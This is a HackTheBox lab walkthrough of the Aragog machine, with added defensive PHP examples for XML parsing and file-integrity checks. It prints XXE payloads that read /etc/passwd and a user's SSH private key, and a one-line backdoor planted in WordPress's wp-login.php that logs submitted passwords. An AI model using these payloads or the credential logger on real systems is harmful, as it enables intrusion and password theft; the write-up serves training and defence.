Hey Everyone! Here is another cool machine from HackTheBox, and it's named Aragog! It's a medium-level Linux machine exploiting one of the OWASP Top 10 vulnerabilities. Let's dive deep to find out how the box gets pwned.
The initial foothold comes from the way the server parses XML data, which leads to XXE (XML External Entity injection). The privilege escalation to root relies on logging passwords through a PHP backdoor planted in WordPress.
With all that said, let's get started!!
Starting with an nmap scan:
⚡root@kali$~/Desktop/htb/aragog> cat aragog.nmap
# Nmap 7.70 scan initiated Sat Jul 18 19:30:47 2020 as: nmap -sC -sV -o aragog.nmap 10.10.10.78
Nmap scan report for 10.10.10.78
Host is up (0.27s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 18 19:31:08 2020 -- 1 IP address (1 host up) scanned in 21.76 seconds
FTP was open with anonymous login allowed, so I quickly fired up an FTP client to look at the contents. There was a file test.txt, which I downloaded to my local machine.
root@kali ~/Desktop/htb/aragog master ftp 10.10.10.78
Connected to 10.10.10.78.
220 (vsFTPd 3.0.3)
Name (10.10.10.78:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.
ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (86 bytes).
226 Transfer complete.
86 bytes received in 0.00 secs (1.4141 MB/s)
Contents of test.txt:
⚡root@kali$~/Desktop/htb/aragog> cat test.txt
<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>
For now the contents of the file don't make any sense, so I just made a note of it.
I started a gobuster scan since port 80 was open:
# gobuster -u http://10.10.10.78 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 50 -x php
It found a file, hosts.php.
Browsing to http://10.10.10.78/hosts.php, this page loaded:
That is vague, but it looks like some sort of host calculation. So I captured the request in Burp and added the contents of the test.txt obtained earlier.
Cool!! It is calculating hosts based on the subnet mask provided. The interesting thing to note is that the request contains XML, so the first thing that comes to mind is XXE!!
I looked up PayloadsAllTheThings and crafted a payload to see if I could retrieve the contents of local files such as /etc/passwd:
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY test1 SYSTEM 'file:///etc/passwd'>]>
<details>
    <subnet_mask>&test1;</subnet_mask>
    <test></test>
</details>
Awesome! The contents are visible and I could see two users listed, florian and cliff. As a next step, I tried to grab any id_rsa files that might be present.
/home/cliff/.ssh/id_rsa didn't work out, but /home/florian/.ssh/id_rsa worked like a charm, and now I had the RSA private key.
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY test1 SYSTEM 'file:///home/florian/.ssh/id_rsa'>]>
<details>
    <subnet_mask>&test1;</subnet_mask>
    <test></test>
</details>
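To show why the payload above works and what the fixed parser looks like, here is an added example in PHP (this is not the box's hosts.php; $body is a constructed request in the test.txt format, with the SYSTEM entity pointed at /etc/hostname instead of /etc/passwd):

```php
<?php
// Added example, not the box's hosts.php. $body is a constructed request in the
// test.txt format carrying a SYSTEM entity like the one in the post.
$body = '<?xml version="1.0"?><!DOCTYPE test [<!ENTITY test1 SYSTEM "file:///etc/hostname">]>'
      . '<details><subnet_mask>&test1;</subnet_mask><test></test></details>';

// Vulnerable: LIBXML_NOENT asks libxml to substitute entities, so the SYSTEM entity is
// read from disk and its contents come back inside <subnet_mask> (the /etc/passwd leak).
function parse_vulnerable(string $xml): ?string
{
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
    return $doc === false ? null : (string) $doc->subnet_mask;
}

// Hardened: no LIBXML_NOENT, no network access, and any document carrying a DOCTYPE
// (the only place an entity can be declared) is rejected outright. The value is then
// allow-listed as a contiguous dotted-quad netmask before it is used.
function parse_hardened(string $xml): ?string
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    if (!$doc->loadXML($xml, LIBXML_NONET) || $doc->doctype !== null) {
        return null;
    }
    $node = $doc->getElementsByTagName('subnet_mask')->item(0);
    $mask = $node ? trim($node->textContent) : '';
    $n = ip2long($mask);
    if ($n === false) {
        return null;
    }
    $inv = ~$n & 0xFFFFFFFF;             // host bits; a valid mask gives 2^k - 1
    return ($inv & ($inv + 1)) === 0 ? $mask : null;
}

// The legitimate job of hosts.php: usable hosts for a validated mask (/26 -> 62).
function usable_hosts(string $mask): int
{
    $hostBits = 32 - substr_count(decbin(ip2long($mask)), '1');
    return max((1 << $hostBits) - 2, 0);
}

var_dump(parse_vulnerable($body));       // string: whatever /etc/hostname contains
var_dump(parse_hardened($body));         // NULL: the DOCTYPE is rejected
$good = '<details><subnet_mask>255.255.255.192</subnet_mask><test></test></details>';
var_dump(usable_hosts(parse_hardened($good)));  // int(62)
```

The fix is two-sided: never pass LIBXML_NOENT (or LIBXML_DTDLOAD) to the parser, and refuse any document that declares a DOCTYPE, since a host calculator has no reason to accept one.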
I then logged in as florian:
# chmod 600 id_rsa
# ssh -i id_rsa email@example.com
# cat user.txt
I uploaded LinEnum.sh to the box and enumerated, and surprisingly there were a lot of WordPress files present. There was a folder dev_wiki that had WordPress installed but that didn't show up in the gobuster scan. There are lots of enumeration results that can lead you in the wrong direction, like the database password in the wp-config file. Yes, you are definitely going to find the administrator password hash in the tables, but it is simply uncrackable.
After listing the contents of dev_wiki, I found out that it was world-writable.
So I went to http://aragog/dev_wiki to look for any useful information. Add an entry in /etc/hosts, 10.10.10.78 aragog, so that the page renders fully (PS: there's virtual host routing).
I found a blog by Administrator. Here the user cliff has administrator privileges. He also writes that he'll be logging in regularly, which means that his password can be sniffed using a backdoor in WordPress.
Let's see how we can make one.
Open wp-login.php under dev_wiki and, under the login case of the switch statement, add the following line. The code will create a file named .passwords and store the username and password whenever anyone logs in. Since we read in the blog earlier that cliff will be logging in regularly, we will end up getting his password.
file_put_contents(".passwords", $_POST['log']. ":". $_POST['pwd']. "\n", FILE_APPEND);
Here's a dummy request to check whether our payload is working (this step is optional).
A new file has been created.
Let's grab the contents.
Amazing, we found the password!
So let's try the password with different accounts, like cliff and root. And it worked with root!! (Users have a habit of reusing passwords!)
The privilege escalation on this box is based entirely on a real-world situation, users reusing the same password in multiple places, which should be avoided completely. Passwords should always be built from random characters and should be stored in a trusted password manager.
That's all for the blog post! Thanks for reading!!
See you in the next one! Until then, happy hunting 🙂
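From the defender's side, the two things that made this privesc possible are a world-writable WordPress tree and a core file that was quietly modified. Here is an added PHP example (not from the post or from WordPress) with the checks that would have flagged both; the fixture is constructed, a throwaway directory with a placeholder wp-login.php that then has a line appended the way the post modifies the real one:

```php
<?php
// Added example, not from the post: flag a world-writable web root (dev_wiki) and a
// core file (wp-login.php) whose SHA-256 no longer matches a known-good baseline.

// Every path under $root, plus $root itself, that has the other-write bit set.
function world_writable(string $root): array
{
    $hits = (fileperms($root) & 0002) ? [$root] : [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $entry) {
        if (fileperms($entry->getPathname()) & 0002) {
            $hits[] = $entry->getPathname();
        }
    }
    return $hits;
}

// $baseline is ['relative/path' => sha256hex] recorded from a clean install.
// Returns the files that are missing or whose hash has changed.
function integrity_violations(string $root, array $baseline): array
{
    $bad = [];
    foreach ($baseline as $rel => $sha) {
        $file = $root . '/' . $rel;
        if (!is_file($file) || !hash_equals($sha, hash_file('sha256', $file))) {
            $bad[] = $rel;
        }
    }
    return $bad;
}

// Constructed fixture: a fake dev_wiki with a placeholder wp-login.php.
$root = sys_get_temp_dir() . '/dev_wiki_' . bin2hex(random_bytes(4));
mkdir($root, 0777);
chmod($root, 0777);                                   // mimic the world-writable dev_wiki
$clean = "<?php\n// placeholder for wp-login.php\n";
file_put_contents($root . '/wp-login.php', $clean);
chmod($root . '/wp-login.php', 0644);
$baseline = ['wp-login.php' => hash('sha256', $clean)];   // recorded before the tampering
file_put_contents($root . '/wp-login.php', "// credential logger appended here\n", FILE_APPEND);

print_r(world_writable($root));                    // [$root]
print_r(integrity_violations($root, $baseline));   // ['wp-login.php']
```

Run against a real install, the baseline would be taken from a pristine copy of the same WordPress version, and a hit on wp-login.php is exactly the signal that the backdoor described above leaves behind.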